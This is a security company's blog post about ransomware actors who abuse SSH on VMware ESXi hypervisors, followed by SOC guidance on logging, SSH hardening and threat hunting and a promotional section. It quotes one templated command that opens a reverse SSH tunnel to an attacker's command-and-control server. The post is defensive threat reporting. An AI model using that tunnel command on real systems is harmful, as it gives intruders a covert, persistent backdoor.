Ransomware gangs targeting VMware ESXi bare metal hypervisors are using SSH tunneling to maintain persistence and evade detection within corporate networks. Here’s what you need to know:
ESXi: A High-Value Target
VMware ESXi hypervisors play a critical role in virtualized environments, hosting multiple virtual machines (VMs) on a single physical server. These appliances are often under-monitored, making them a prime target for attackers aiming to steal data, deploy ransomware, and render entire infrastructures inoperable by encrypting VMs.
Entry Points and Exploitation
According to cybersecurity firm Sygnia, attackers gain access by exploiting known vulnerabilities or using stolen administrator credentials. Once access is obtained, ransomware actors use ESXi’s built-in SSH service to set up covert connections, establish persistence, and move laterally within the network.
Leveraging SSH for Stealthy Persistence
The SSH service in ESXi allows administrators to remotely manage the hypervisor, but attackers abuse this feature for malicious purposes. Using SSH, they can establish reverse port-forwarding tunnels to their command-and-control (C2) servers with a single command:
phpCopyEditssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
Since ESXi appliances are rarely rebooted, these tunnels act as semi-persistent backdoors, enabling attackers to operate undetected over extended periods.
Logging Challenges on ESXi
Monitoring ESXi activity is complicated by its fragmented logging system. Unlike traditional systems with consolidated logs, ESXi disperses logs across multiple files, creating visibility gaps that attackers exploit. Key logs to monitor for SSH activity include:
- /var/log/shell.log: Tracks commands executed in the ESXi shell.
- /var/log/hostd.log: Logs administrative actions and user authentication.
- /var/log/auth.log: Captures login attempts and authentication events.
- /var/log/vobd.log: Stores system and security event data.
Additionally, attackers may modify or delete logs to obscure evidence of their presence, complicating forensic investigations.
What SOC Teams Need to Know
To effectively address the evolving threat landscape targeting VMware ESXi hypervisors, Security Operations Center (SOC) teams must prioritize proactive monitoring and response strategies. Below are key focus areas for SOC teams to enhance their defenses and mitigate risks associated with SSH tunneling and ransomware activity:
1. Prioritize ESXi Logging and Monitoring
- Centralize Logs: Integrate ESXi logs into a centralized Security Information and Event Management (SIEM) system to detect anomalies and improve visibility across the infrastructure.
- Monitor Key Log Files: Regularly review critical ESXi logs such as
shell.log,auth.log,hostd.log, andvobd.logfor unusual activity, including unauthorized SSH connections and firewall modifications. - Detect Log Tampering: Look for gaps, missing logs, or unusual timestamps that could indicate attacker attempts to cover their tracks.
2. Enhance SSH Security
- Restrict SSH Access: Limit SSH usage to authorized personnel and trusted IP addresses. Configure firewalls to block unauthorized connections and disable SSH access when not in active use.
- Implement Multi-Factor Authentication (MFA): Strengthen SSH authentication with MFA to prevent unauthorized access even if credentials are compromised.
- Audit SSH Activity: Monitor for abnormal SSH usage patterns, such as frequent remote connections or high-volume data transfers.
3. Hardening ESXi Configurations
- Apply Regular Updates: Ensure ESXi systems are up to date with the latest patches and security updates to address known vulnerabilities.
- Enforce Least Privilege: Limit administrative permissions to only those necessary for specific tasks, reducing the risk of credential abuse.
- Review Firewall Rules: Regularly audit and harden firewall configurations to block unauthorized access and close unused ports.
4. Threat Hunting and Anomaly Detection
- Identify Indicators of Compromise (IOCs): Train SOC analysts to recognize IOCs associated with SSH tunneling and ransomware campaigns, such as new or unknown SSH keys and unusual remote port-forwarding activity.
- Establish Baselines: Understand normal traffic patterns in your environment to more effectively identify anomalies.
- Conduct Proactive Threat Hunts: Leverage threat intelligence and hunt for signs of compromise across all ESXi systems, focusing on both live traffic and historical logs.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
